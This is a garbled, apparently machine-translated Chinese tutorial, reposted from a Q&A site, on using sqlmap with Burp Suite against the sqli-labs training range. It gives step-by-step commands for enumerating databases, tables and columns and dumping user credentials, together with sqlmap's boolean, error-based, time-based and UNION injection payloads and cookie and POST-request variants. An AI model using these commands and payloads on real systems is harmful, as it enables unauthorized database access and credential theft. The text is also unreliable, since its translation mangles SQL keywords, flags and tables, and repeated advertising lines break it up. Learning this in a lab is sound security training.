渗透测试 渗透测试工具

渗透测试
在终端中输入如下语句:
python sqlmap.py -u http://192.168.xx.xx/sqli-labs-master/Less-1/?id1这样SQLMAP就会对指定的URL进行扫描,如果想要使BurpS

在终端: 上输入以下语句:

python sqlmap.py -u http://192.168.xx.xx/sqli-labs-master/Less-1/?id=1

这样,SQLMAP就会扫描指定的URL。如果希望BurpSuite在扫描过程中捕获请求数据包,可以使用SQLMAP proxy参数:

python sqlmap.py -u http://192.168.xx.xx/sqli-labs-master/Less-1/?id=1

–代理=http://127.0.0.1:8080

SQLMAP 开始扫描: BurpSuite 捕获数据包:

如果该选项在SQLMAP 扫描期间出现,只需选择Y。

后端DBMS似乎是“MySQL”。

跳过特定于其他DBMS 的测试负载? [Y/n] y

您想将其包含在测试的其余部分中吗?

对“MySQL”的所有测试扩展了提供的级别(1) 和风险(1) 值[Y/n] y?

SQLMAP扫描完成后,你会看到检测到的SQL注入漏洞和对应的注入点,以及PAYLOAD:(以下包含我个人添加的翻译,以帮助你理解)

sqlmap识别出以下注入点,总共有50个HTTP请求:—

SQLMAP 使用50 个HTTP 请求识别出以下注入点:

参数: ID (GET)

Type: Boolean-based Blind(基于布尔的盲注)

Title: AND 基于布尔的盲注- WHERE 或HAVING 子句

有效负载: id=1\’ AND 3826=3826 AND \’mrQK\’=\’mrQK

Type:错误库(错误注入)

Title: MySQL=5.0 AND 基于错误- WHERE、HAVING、ORDER BY 或GROUP BY 子句(FLOOR)

有效负载: id=1\’ AND (SELECT 9262 FROM(SELECT COUNT(*),CONCAT(0x7162627071,(SELECT (ELT(9262=9262,1)))),0x716a707671,FLOOR(RAND(0)*2))x来自INFORMATION_SCHEMA .PLUGINS GROUP BY x)a) AND \’HuUe\’=\’HuUe

Type: Time-based Blind(时间盲注)

Title: MySQL=5.0.12 AND 基于时间的盲法(查询SLEEP)

Payload: id=1\’ AND (SELECT 1174 FROM (SELECT(SLEEP(5)))wyad) AND \’LVya\’=\’LVya

Type: UNION查询(联合注入)

Title: 常见UNION 查询(NULL) – 3 列

有效负载: id=-5616\’ UNION ALL 选择NULL, CONCAT(0x7162627071,0x72566d5973464e4571724343676c7567496d635a47414a62556b4475495562624744556b76686a 6 e,0x716a707671), NULL — –

我们还看到SQLMAP 对有效负载中的一些重要点进行了编码,以绕过可能的过滤方法。

注入成功后获取数据库基本信息:

获取服务器中有哪些数据库:

使用的参数是–dbs。

\\sqlmap-master\\sqlmap-master python sqlmap.py

-u http://192.168.xx.xx/sqli-labs-master/Less-1/?id=1

–proxy=http://127.0.0.1:8080 –dbs

发现目标主机中所有数据库名都成功检索到:

可用数据库[8]:

[*] 问题

[*]dvwa

[*] 信息架构

[*]mysql

[*] 性能架构

[*] 安全

[*] 测试

[*] xionghai_database

获取数据库中有那些表:

使用的参数是-D数据库名称–tables。

这里我们将查询安全数据库:

\\sqlmap-master\\sqlmap-master python sqlmap.py

-u http://192.168.xx.xx/sqli-labs-master/Less-1/?id=1

–proxy=http://127.0.0.1:8080 -D 安全–table

原来SQLMAP不仅提供了表格,还提供了目标服务器:的web信息

获取数据表中的字段名:

使用的参数是-D数据库名称-T表名称–columns。

这里我们在安全方面使用用户表:

\\sqlmap-master\\sqlmap-master python sqlmap.py

-u http://192.168.xx.xx/sqli-labs-master/Less-1/?id=1

–proxy=http://127.0.0.1:8080 -D 安全-T 用户–columns

SQLMAP不仅指定了字段名称,还指定了字段类型:

数据库:安全

表:个用户

[3行]

+———-+—————-+

| 栏目类型|

+———-+—————-+

密码(20) |

| ID(3) |

| 用户名| varchar(20) |

+———-+—————-+

获取数据表中的字段数据

使用的参数为-D 数据库名-T 表名-C \”字段名1,字段名2.\” –dump

\\sqlmap-master\\sqlmap-master python sqlmap.py

-u http://192.168.xx.xx/sqli-labs-master/Less-1/?id=1

–代理=http://127.0.0.1:8080

-D security -T user -C \’ID、用户名、密码\’ –dump

数据库:安全

表:个用户

[16 条记录]

+—–+————+———-+

| 账号| 密码

+—–+————+———-+

| 白痴|

2 | 安吉丽娜|

| 假人|

| 糟糕的安全|

| 5 | 愚蠢

| 6 | 天才

| 手机!

| 8 | 123456 |

| 管理员1 |

| 管理员2 |

| 管理员3 |

| 小飞象|

以上只是SQLMAP最基本的用法。让我们总结并扩展SQLMAP 的其他用途。

渗透测试-sqlmap数据库注入测试一步步(二)-使用概述-使用概述\’)

SQLMAP用法的总结与拓展:

基本的检测方式:

基本格式:sqlmap -u \”http://www.vuln.cn/post.php?id=1\” 默认使用level1 检测所有数据库类型sqlmap -u \”http://www.vuln.cn/post.php?id=1\” – -dbms mysql –level 3 指定数据库类型为mysql,级别3(共5级,级别越高,发现越全面) follow 302 跳转:sqlmap –follow-redirect -u target_url 页面出错时自动插入错误时跳转到另一页。该页面后面必须有302。如果注入错误,先报错再跳转就不需要再跟302了。 目的是跟踪错误消息。 Cookie****注入: 如果你的程序有防get注入,使用Cookie注入sqlmap -u \”http://www.baidu.com/shownews.asp\” –cookie \”id=11\” –level 2 (仅级别)即可。到达2,检测到cookie)从post数据包中插入:您可以使用burpsuite来获取post包。 sqlmap -r \”c:\\tools\\request.txt\” -p \”username\” –dbms mysql 用户名参数必须指定。指定-r参数请求包(即POST请求包)所在路径

拓展:SQLMAP的-u参数与-r参数

-u 参数后跟URL。这通常用于扫描GET 请求。

-r 参数后跟一个txt 文件,其中包含用于扫描POST 请求的HTTP 请求。

例如,sqli-labs-master 射程中的less-11 使用此级别的POST 请求。扫描需要-r 来复制整个URL。发出POST请求,保存到:的txt文件中(这个txt文件最好和sqlmap.py放在同一目录下,这样更容易指定路径)。

在终端中使用python sqlmap.py -r 1.txt –dbs 查询您拥有的数据库。

PS D:\\123pan\\Downloads\\W14—SQL注入5—23.7.25\\sqlmap-master\\sqlmap-master python sqlmap.py -r 1.txt –dbs

___

__H__

___ ___[.]_____ ___ ___ {1.7.5#stable}

|_ -| 。

|__|_ [\’]_|_|_|__,|

|_|V. |_| https://sqlmap.org

获取数据库基本信息:

查询哪个数据库-r XX.txt –dbs (-r指定POST请求驻留路径)

既有适合初学者学习的基础教材,也有适合3年以上经验的朋友深入学习和提高的高级课程,涵盖了95%以上的软件测试知识点,非常系统。

|

| 查询哪个数据库| -r XX.txt –dbs (-r指定POST请求所在路径)

[外部链接图像正在传输.(img-jh7MiVek-1719272232057)]

[外部链接图片正在传输中.(img-GPFSFcss-1719272232058)]

[外部链接图像正在传输.(img-k9kU7s9I-1719272232059)]

既有适合初学者学习的基础教材,也有适合3年以上经验的朋友深入学习和提高的高级课程,涵盖了95%以上的软件测试知识点,非常系统。

以上关于#PenetrationTesting的相关内容摘自网络,仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92165.html

(0)
CSDN的头像CSDN
上一篇 2024年6月25日
下一篇 2024年6月25日

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注